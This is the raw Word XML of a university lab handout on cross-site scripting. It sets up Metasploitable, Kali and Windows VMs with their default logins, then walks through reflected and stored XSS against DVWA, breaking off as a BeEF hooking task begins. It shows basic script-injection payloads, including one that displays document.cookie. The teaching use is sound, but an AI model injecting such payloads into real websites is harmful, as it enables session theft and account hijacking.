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5E00" w:rsidRDefault="001A663D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 xml:space="preserve">XSS- Cross Site Scripting Attack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576"/>
      </w:tblGrid>
      <w:tr w:rsidR="009801A3" w:rsidTr="00D224C2">
        <w:trPr>
          <w:trHeight w:val="638"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00D224C2" w:rsidRDefault="00D224C2" w:rsidP="00D224C2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 2016-2017 Frank Xu, Bowie State University.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DD2425" w:rsidRPr="00DD2425" w:rsidRDefault="00D224C2" w:rsidP="00D224C2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</w:t>
            </w:r>
            <w:r w:rsidRPr="0085406B"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>is developed</w:t>
            </w:r>
            <w:r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 xml:space="preserve"> for cybersecurity courses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at BSU. Comments and suggestions can </w:t>
            </w:r>
            <w:r w:rsidRPr="0085406B">
              <w:rPr>
                <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:eastAsiaTheme="minorEastAsia" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>be sent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615E00" w:rsidRPr="00CB1F5D" w:rsidRDefault="00615E00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CB1F5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Lab Environment</w:t>
      </w:r>
      <w:r w:rsidR="00A809CB" w:rsidRPr="00CB1F5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> setting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A73E8" w:rsidRPr="008A73E8" w:rsidRDefault="008A73E8" w:rsidP="008A73E8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</w:instrText>
      </w:r>
      <w:r w:rsidRPr="008A73E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:instrText>https://information.rapid7.com/metasploitable-download.html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D72271">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>https://</w:t>
      </w:r>
      <w:r w:rsidRPr="008A73E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Download and install </w:t>
      </w:r>
      <w:r w:rsidRPr="0085406B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A73E8" w:rsidRDefault="008A73E8" w:rsidP="008A73E8">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72271">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>information.rapid7.com/metasploitable-download.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A73E8" w:rsidRDefault="008A73E8" w:rsidP="008A73E8">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0085406B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Use</w:t>
      </w:r>
      <w:r w:rsidR="0085406B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="0085406B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="0085406B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">   Password: </w:t>
      </w:r>
      <w:r w:rsidRPr="0085406B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A73E8" w:rsidRPr="008A73E8" w:rsidRDefault="008A73E8" w:rsidP="008A73E8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8A73E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Download and install </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kali to VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A73E8" w:rsidRDefault="008A73E8" w:rsidP="008A73E8">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0085406B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Use</w:t>
      </w:r>
      <w:r w:rsidR="0085406B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="0085406B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="008A73E8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root</w:t>
      </w:r>
      <w:r w:rsidRPr="008A73E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">   Password: </w:t>
      </w:r>
      <w:r w:rsidRPr="0085406B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:t>toor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D03235" w:rsidRPr="008A73E8" w:rsidRDefault="00D03235" w:rsidP="00D03235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8A73E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Download and install </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Win10 to VirtualBox</w:t>
      </w:r>
      <w:r w:rsidR="00140818">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Optional in this lab)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D03235" w:rsidRPr="00D03235" w:rsidRDefault="00C95809" w:rsidP="00D03235">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00D03235" w:rsidRPr="00D03235">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002A278A" w:rsidRDefault="002A278A" w:rsidP="00D03235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ke sure </w:t>
      </w:r>
      <w:r w:rsidR="00D03235">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>three</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D03235">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Virtual Machines</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> are in the same network. You need to Ping each other to make sure the network works.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E5925" w:rsidRDefault="002E5925" w:rsidP="002E5925">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E5925">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Win 10: 10.0.2.9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D143E7" w:rsidRDefault="00D143E7" w:rsidP="00D143E7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D143E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00D143E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>etasploitable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: 10.0.2.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15ABA" w:rsidRDefault="00D143E7" w:rsidP="00F15ABA">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D143E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kali: 10.0.2.11</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15ABA" w:rsidRDefault="00F15ABA" w:rsidP="00A959CE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59083E18" wp14:editId="500F2116">
            <wp:extent cx="5875376" cy="2389069"/>
            <wp:effectExtent l="152400" t="152400" r="354330" b="3543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9806" cy="24030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E5925" w:rsidRDefault="002E5925" w:rsidP="00A959CE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E5925" w:rsidRDefault="002E5925" w:rsidP="002E5925">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E5925" w:rsidRDefault="002E5925" w:rsidP="00A959CE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22D37AAD" wp14:editId="7B4B40EA">
            <wp:extent cx="4328865" cy="2042336"/>
            <wp:effectExtent l="152400" t="152400" r="357505" b="3581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7382" cy="20463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30C21" w:rsidRPr="00130C21" w:rsidRDefault="00E70050" w:rsidP="00130C21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00130C21">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Launch Damn Vulnerable Web Application (DVWA) and set security level to low </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00130C21" w:rsidRDefault="00F70001" w:rsidP="00130C21">
      <w:pPr>
        <w:ind w:left="36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FECBAAC" wp14:editId="7F2DF0CF">
            <wp:extent cx="3532306" cy="2854197"/>
            <wp:effectExtent l="152400" t="152400" r="354330" b="3657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92193" cy="29025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30C21" w:rsidRDefault="00130C21" w:rsidP="00130C21">
      <w:pPr>
        <w:ind w:left="36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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="094EEAC8" wp14:editId="3391AB5C">
            <wp:extent cx="4681404" cy="2373212"/>
            <wp:effectExtent l="152400" t="152400" r="367030" b="3702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9722" cy="24230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F15ABA" w:rsidRPr="00130C21" w:rsidRDefault="00836EEE" w:rsidP="00130C21">
      <w:pPr>
        <w:ind w:left="360"/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902AF35" wp14:editId="149E4E97">
            <wp:extent cx="3890890" cy="1902798"/>
            <wp:effectExtent l="152400" t="152400" r="357505" b="3644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4716" cy="1943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130C21" w:rsidRDefault="00130C21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</w:p>
    <w:p w:rsidR="003D4F9B" w:rsidRDefault="002A278A" w:rsidP="00CB1F5D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CB1F5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 1</w:t>
      </w:r>
      <w:r w:rsidR="00D143E7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 w:rsidR="0055640E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Reflected XSS Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E14A75" w:rsidRPr="00E14A75" w:rsidRDefault="00E14A75" w:rsidP="00E14A75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bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E14A75">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Following steps marked in the screenshot and de</w:t>
      </w:r>
      <w:r w:rsidR="008123EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>scribing</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14A75">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> your observation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00604B5A" w:rsidRDefault="00604B5A" w:rsidP="009D36FB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16350513" wp14:editId="0B106F70">
            <wp:extent cx="5249263" cy="3123760"/>
            <wp:effectExtent l="152400" t="152400" r="370840" b="3625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1900" cy="3131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9D36FB">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A5FAC09" wp14:editId="7357D7DE">
            <wp:extent cx="5052985" cy="566283"/>
            <wp:effectExtent l="152400" t="152400" r="357505" b="3676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0778" cy="5693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43091" w:rsidRDefault="00D43091" w:rsidP="00D43091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Right-click and view page source. Can you find the </w:t>
      </w:r>
      <w:r w:rsidR="00065882">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>JavaScript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code you just typed?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D36FB" w:rsidRDefault="00604B5A" w:rsidP="00604B5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605B1A6B" wp14:editId="22115443">
            <wp:extent cx="3456749" cy="1534709"/>
            <wp:effectExtent l="152400" t="152400" r="353695" b="3708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72868" cy="15418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65882" w:rsidRDefault="00065882" w:rsidP="00065882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CB1F5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Task </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>2: Stored XSS Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B800DC" w:rsidRPr="0001540C" w:rsidRDefault="00B800DC" w:rsidP="00325561">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27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/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325561">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Can you exploit the reflected XSS in Message </w:t>
      </w:r>
      <w:r w:rsidRPr="0085406B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r w:rsidR="0085406B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0085406B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>box</w:t>
      </w:r>
      <w:r w:rsidRPr="00325561">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> below</w:t>
      </w:r>
      <w:r w:rsidR="00531D6F" w:rsidRPr="00325561">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidR="00325561" w:rsidRPr="0001540C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert("test")&lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0001540C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25232625" wp14:editId="5DF24D70">
            <wp:extent cx="5062775" cy="2780199"/>
            <wp:effectExtent l="152400" t="152400" r="367030" b="3632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73063" cy="27858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1540C" w:rsidRPr="0001540C" w:rsidRDefault="0001540C" w:rsidP="00325561">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27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Close the Browser and reopen the same page. Describe your observation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001540C" w:rsidRPr="006B6294" w:rsidRDefault="00175118" w:rsidP="00325561">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27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175118">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0001540C" w:rsidRPr="0001540C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B6294" w:rsidRPr="006B6294">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">in the message textbox </w:t>
      </w:r>
      <w:r w:rsidRPr="00175118">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="006B6294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</w:rPr>
        <w:t>describe your observation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00353DA4" w:rsidRDefault="00834E88" w:rsidP="00834E88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/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00834E88">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Task </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00834E88"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Hooking Vulnerable Website to </w:t>
      </w:r>
      <w:r w:rsidR="00D34182" w:rsidRPr="00641506">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="00641506" w:rsidRPr="00641506">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Browser Exploitation Framework</w:t>
      </w:r>
      <w:r w:rsidR="00641506">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (BeEF)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B48E1" w:rsidRPr="007B48E1" w:rsidRDefault="007B48E1" w:rsidP="002D79BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28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7B48E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Log in Beef</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00353DA4" w:rsidRPr="00834E88" w:rsidRDefault="00353DA4" w:rsidP="00353DA4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="120" w:line="324" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b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5019235F" wp14:editId="73FCF030">
            <wp:extent cx="4524430" cy="2046144"/>
            <wp:effectExtent l="152400" t="152400" r="352425" b="3543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74682" cy="20688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01540C" w:rsidRPr="007B48E1" w:rsidRDefault="00B608B2" w:rsidP="002D79BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28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t>Hook Kali itself (don’t make sense, just for demo)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E00DD6" w:rsidRDefault="00E00DD6" w:rsidP="00604B5A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
          <w:color w:val="000000"/>
